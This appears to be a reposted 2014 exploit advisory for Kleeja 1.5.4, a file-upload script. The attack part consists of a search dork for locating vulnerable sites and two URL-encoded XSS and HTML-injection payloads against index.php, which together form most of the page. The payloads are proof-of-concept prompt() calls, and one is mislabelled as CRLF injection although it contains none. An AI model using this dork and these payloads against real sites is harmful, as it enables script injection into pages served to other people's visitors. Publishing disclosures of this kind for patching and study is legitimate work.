facebook facebook twitter rss

kleeja 1.5.4 ( XSS / HTML Inject ) Vulnerability

Author: indoushka , Published: 25-10-2014
kleeja 1.5.4 ( XSS / HTML Inject ) Vulnerability
================================================
Author : indoushka
Vondor : http://www.kleeja.com/
Dork: Powered by Kleeja
==================================

CRLF injection/HTTP response splitting :

http://127.0.0.1/kleeja/1/index.php/%22%3Cmarquee%3E%3Cfont%20color=Blue%20size=32%3ETest%3C/font%3E%3C/marquee%3E%3d%27prompt%28987964%29%27bad%3d%22%3E

Cross site scripting (verified) :

/kleeja/1/index.php/%22onmouseover%3d'prompt(987964)'bad%3d%22>

Like us on Facebook :